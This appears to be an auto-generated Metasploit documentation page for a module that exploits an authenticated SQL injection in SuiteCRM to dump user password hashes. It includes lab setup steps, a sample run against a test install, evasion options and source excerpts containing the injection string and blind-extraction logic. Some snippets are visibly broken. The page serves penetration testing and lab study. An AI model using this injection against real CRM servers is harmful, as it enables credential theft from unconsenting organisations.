SuiteCRM authenticated SQL injection in export functionality - Metasploit

This page contains detailed information about how to use the auxiliary/gather/suite_crm_export_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: SuiteCRM authenticated SQL injection in export functionality
Module: auxiliary/gather/suite_crm_export_sqli
Source code: modules/auxiliary/gather/suite_crm_export_sqli.rb
Disclosure date: 2022-05-24
Last modification time: 2022-09-12 23:46:10 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order to retrieve all the usernames and their associated password from the database.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.


  • repeatable-session: The module is expected to get a shell every time it runs.


  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage

msf > use auxiliary/gather/suite_crm_export_sqli
msf auxiliary(suite_crm_export_sqli) > show targets
    ... a list of targets ...
msf auxiliary(suite_crm_export_sqli) > set TARGET target-id
msf auxiliary(suite_crm_export_sqli) > show options
    ... show and set options ...
msf auxiliary(suite_crm_export_sqli) > exploit

Required Options

  • RHOSTS: The target host(s), see

Knowledge Base


This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password hashes from the SuiteCRM database.

Vulnerable Application

The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM. There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users, browse to /index.php?module=Users&action=index and then click the Create New User button on the left side of the screen. Then enter a username and a last name. Then click the password tab, and enter a password for the user, then confirm this password and click the Save button to create the user.

Docker compose

Prerequisites: Docker and Docker Compose must be installed first.

To create a SuiteCRM 7.12.5 Docker container, first create a new folder, then save the following content as docker-compose.yml:

version: '2'
      # ALLOW_EMPTY_PASSWORD is recommended only for development.
      - MARIADB_USER=bn_suitecrm
      - MARIADB_DATABASE=bitnami_suitecrm
      - MARIADB_PASSWORD=bitnami123
      - 'mariadb_data:/bitnami/mariadb'
      - '80:8080'
      - '443:8443'
      - SUITECRM_DATABASE_USER=bn_suitecrm
      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
      # ALLOW_EMPTY_PASSWORD is recommended only for development.
      - 'suitecrm_data:/bitnami/suitecrm'
      - mariadb
    driver: local
    driver: local 

Finally, in the same directory as the docker-compose.yml file, run: docker-compose up -d.

Note that the default username to log in will be user and the password will be bitnami. If you want to change these, put the following lines under the environment section:

      - SUITECRM_USERNAME=my_user
      - SUITECRM_PASSWORD=my_password

The above would set the username to my_user and the password to my_password.

For more information on the docker compose file, refer to

Install from source

Source code can be found here: SuiteCRM v7.12.5

Instructions on installing from source can be found here: Installation Guide

The following setup was installed on Ubuntu 20.04:

  1. Setup and install MySQL:

    1. sudo apt update
    2. sudo apt install mysql-server
    3. sudo systemctl start mysql.service
    4. sudo mysql (open the mysql prompt)
    5. mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password'; (change the password of the root user)
  2. Install Apache

    1. sudo apt install apache2
    2. sudo systemctl enable apache2
    3. sudo systemctl start apache2
  3. Install php and its dependencies

    1. sudo apt -y install php7.4
    2. sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip
    3. sudo apt install composer
    4. composer install
  4. Setup and install SuiteCRM 7.12.5

    1. wget
    2. gunzip v7.12.5.tar.gz
    3. tar -xvf v7.12.5.tar
    4. sudo cp -r SuiteCRM-7.12.5/. /var/www/html
    5. cd /var/www/html
    6. sudo chown -R www-data:www-data .
    7. sudo chmod -R 755 .
    8. sudo chmod -R 775 custom modules themes data upload
    9. sudo chmod 775 config_override.php 2>/dev/null
    10. Navigate to http://localhost/install.php and follow the installation wizard to complete the install

Verification Steps

  1. Start up metasploit
  2. Do: use auxiliary/gather/suite_crm_export_sqli
  3. Do: set RHOSTS [IP]
  4. Configure a user and password by setting USERNAME and PASSWORD.
  5. Do: run


SuiteCRM 7.12.5 Bitnami Docker Image

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli 
msf6 auxiliary(gather/suite_crm_export_sqli) > show options

Module options (auxiliary/gather/suite_crm_export_sqli):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   COUNT     3                no        Number of users to enumerate
   PASSWORD                   yes       Password for user
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME                   yes       Username of user
   VHOST                      no        HTTP server virtual host

Auxiliary action:

   Name              Description
   ----              -----------
   Dump credentials  Dumps usernames and passwords from the users table

msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
USERNAME => user
msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
PASSWORD => bitnami
msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS
msf6 auxiliary(gather/suite_crm_export_sqli) > check

[*] Authenticating as user
[+] Authenticated as: user
[*] Version detected: 7.12.5
[+] - The target is vulnerable.
msf6 auxiliary(gather/suite_crm_export_sqli) > run
[*] Running module against

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating as user
[+] Authenticated as: user
[*] Version detected: 7.12.5
[+] The target is vulnerable.
[*] Fetching Users, please wait...
SuiteCRM User Names


[*] Fetching Hashes, please wait...
[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
SuiteCRM User Credentials

 Username  Hash
 --------  ----
 testuser  $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
 user      $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO

[*] Auxiliary module execution completed
msf6 auxiliary(gather/suite_crm_export_sqli) > 

Go back to menu.

Msfconsole Usage

Here is how the gather/suite_crm_export_sqli auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/suite_crm_export_sqli

msf6 auxiliary(gather/suite_crm_export_sqli) > show info

       Name: SuiteCRM authenticated SQL injection in export functionality
     Module: auxiliary/gather/suite_crm_export_sqli
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2022-05-24

Provided by:
  Exodus Intelligence
  Redouane NIBOUCHA <[email protected]>

Module side effects:

Module stability:

Module reliability:

Available actions:
  Name              Description
  ----              -----------
  Dump credentials  Dumps usernames and passwords from the users table

Check supported:

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  COUNT     3                no        Number of users to enumerate
  PASSWORD                   yes       Password for user
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target host(s), see
  RPORT     80               yes       The target port (TCP)
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   yes       Username of user
  VHOST                      no        HTTP server virtual host

  This module exploits an authenticated SQL injection in SuiteCRM in 
  versions before 7.12.6. The vulnerability allows an authenticated 
  attacker to send specially crafted requests to the export entry 
  point of the application in order to retrieve all the usernames and 
  their associated password from the database.


Module Options

This is a complete list of options available in the gather/suite_crm_export_sqli auxiliary module:

msf6 auxiliary(gather/suite_crm_export_sqli) > show options

Module options (auxiliary/gather/suite_crm_export_sqli):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   COUNT     3                no        Number of users to enumerate
   PASSWORD                   yes       Password for user
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME                   yes       Username of user
   VHOST                      no        HTTP server virtual host

Auxiliary action:

   Name              Description
   ----              -----------
   Dump credentials  Dumps usernames and passwords from the users table

Advanced Options

Here is a complete list of advanced options supported by the gather/suite_crm_export_sqli auxiliary module:

msf6 auxiliary(gather/suite_crm_export_sqli) > show advanced

Module advanced options (auxiliary/gather/suite_crm_export_sqli):

   Name                     Current Setting                        Required  Description
   ----                     ---------------                        --------  -----------
   AutoCheck                true                                   no        Run check before exploit
   DOMAIN                   WORKSTATION                            yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                   no        Conform to IIS, should work for most servers. Only set to false for
                                                                             non-IIS servers
   FingerprintCheck         true                                   no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                  no        Override check result
   HttpClientTimeout                                               no        HTTP connection and receive timeout
   HttpPassword                                                    no        The HTTP password to specify for authentication
   HttpRawHeaders                                                  no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                  no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                  no        Show HTTP headers only in HttpTrace
   HttpUsername                                                    no        The HTTP username to specify for authentication
   SSLServerNameIndication                                         no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                   yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
                                                                             uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
   SqliDelay                1.0                                    no        The delay to sleep on time-based blind SQL injections
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS   no        The User-Agent header to use for all requests
                            X 12.2; rv:97.0) Gecko/20100101 Firef
   VERBOSE                  false                                  no        Enable detailed status messages
   WORKSPACE                                                       no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the gather/suite_crm_export_sqli module can do:

msf6 auxiliary(gather/suite_crm_export_sqli) > show actions

Auxiliary actions:

   Name              Description
   ----              -----------
   Dump credentials  Dumps usernames and passwords from the users table

Evasion Options

Here is the full list of possible evasion options supported by the gather/suite_crm_export_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/suite_crm_export_sqli) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to authenticate to SuiteCRM

Here is a relevant code snippet related to the "Unable to authenticate to SuiteCRM" error message:

50:	    ]
51:	  end
53:	  def check
54:	    authenticated = authenticate
55:	    return Exploit::CheckCode::Safe('Unable to authenticate to SuiteCRM') unless authenticated
57:	    res = send_request_cgi(
58:	      {
59:	        'method' => 'GET',
60:	        'uri' => normalize_uri(target_uri, 'index.php'),

Trying to query the SuiteCRM version information failed

Here is a relevant code snippet related to the "Trying to query the SuiteCRM version information failed" error message:

64:	          'action' => 'About'
65:	        }
66:	      }
67:	    )
69:	    return Exploit::CheckCode::Safe('Trying to query the SuiteCRM version information failed') unless res&.body
71:	    version =\s+((?:\d+\.)+\d+).*/)[1])
72:	    return Exploit::CheckCode::Safe('Could not find retrieve the version of SuiteCRM from the version page') unless version
74:	    print_status "Version detected: #{version}"

Could not find retrieve the version of SuiteCRM from the version page

Here is a relevant code snippet related to the "Could not find retrieve the version of SuiteCRM from the version page" error message:

67:	    )
69:	    return Exploit::CheckCode::Safe('Trying to query the SuiteCRM version information failed') unless res&.body
71:	    version =\s+((?:\d+\.)+\d+).*/)[1])
72:	    return Exploit::CheckCode::Safe('Could not find retrieve the version of SuiteCRM from the version page') unless version
74:	    print_status "Version detected: #{version}"
76:	    return Exploit::CheckCode::Vulnerable if version <='7.12.5')

Failed to authenticate as: <USERNAME>

Here is a relevant code snippet related to the "Failed to authenticate as: <USERNAME>" error message:

128:	    if res && res.code == 200 && res.body.include?('SuiteCRM') && res.get_cookies.include?('sugar_user_theme=') && res.body.include?('SUGAR.unifiedSearchAdvanced')
129:	      print_good("Authenticated as: #{datastore['USERNAME']}")
130:	      true
131:	    else
132:	      print_error("Failed to authenticate as: #{datastore['USERNAME']}")
133:	      false
134:	    end
135:	  end
137:	  # This module sends this same request multiple times. In order to reduce code it has beed moved it into it's owm method

The server did not respond to the request with the payload: <PAYLOAD>

Here is a relevant code snippet related to the "The server did not respond to the request with the payload: <PAYLOAD>" error message:

147:	        'action' => 'index'
148:	      }
149:	    })
151:	    if res&.code != 200
152:	      fail_with(Failure::UnexpectedReply, "The server did not respond to the request with the payload: #{payload}")
153:	    end
154:	    res
155:	  end
157:	  # @return an array of usernames

The server responded unexpectedly to a request sent with uid: ",\,))+AND+1=2;+--+"

Here is a relevant code snippet related to the "The server responded unexpectedly to a request sent with uid: ",\,))+AND+1=2;+--+"" error message:

188:	    hashes
189:	  end
191:	  def init_sqli
192:	    wrong_resp_length = send_injection_request_cgi(',\\,))+AND+1=2;+--+')&.body&.length
193:	    fail_with(Failure::UnexpectedReply, 'The server responded unexpectedly to a request sent with uid: ",\\,))+AND+1=2;+--+"') unless wrong_resp_length
194:	    sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
195:	      fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
196:	      resp_length = send_injection_request_cgi(",\\,))+OR+(#{payload});+--+")&.body&.length
197:	      resp_length != wrong_resp_length
198:	    end

comma in payload

Here is a relevant code snippet related to the "comma in payload" error message:

191:	  def init_sqli
192:	    wrong_resp_length = send_injection_request_cgi(',\\,))+AND+1=2;+--+')&.body&.length
193:	    fail_with(Failure::UnexpectedReply, 'The server responded unexpectedly to a request sent with uid: ",\\,))+AND+1=2;+--+"') unless wrong_resp_length
194:	    sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
195:	      fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
196:	      resp_length = send_injection_request_cgi(",\\,))+OR+(#{payload});+--+")&.body&.length
197:	      resp_length != wrong_resp_length
198:	    end
200:	    # redefine blind_detect_length and blind_dump_data because of the bad characters the payload cannot include

Somehow this got messed up!

Here is a relevant code snippet related to the "Somehow this got messed up!" error message:

215:	              break
216:	            elsif blind_request("length(cast((#{query}) as binary))=#{max_length}")
217:	              output_length = max_length
218:	              break
219:	            else
220:	              fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
221:	            end
222:	          end
223:	          output_length = (min_length + max_length) / 2 + 1
224:	        else
225:	          max_length = output_length

Somehow this got messed up!

Here is a relevant code snippet related to the "Somehow this got messed up!" error message:

248:	                break
249:	              elsif blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{max_value}")
250:	                character_value = max_value
251:	                break
252:	              else
253:	                fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
254:	              end
255:	            end
256:	            character_value = (min_value + max_value) / 2 + 1
257:	          else
258:	            max_value = character_value

Unable to authenticate to SuiteCRM

Here is a relevant code snippet related to the "Unable to authenticate to SuiteCRM" error message:

270:	  end
272:	  def run
273:	    unless datastore['AutoCheck']
274:	      authenticated = authenticate
275:	      fail_with(Failure::NoAccess, 'Unable to authenticate to SuiteCRM') unless authenticated
276:	    end
278:	    sqli = init_sqli
279:	    users = get_user_names(sqli)

Go back to menu.


See Also

Check also the following modules related to this module:



This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.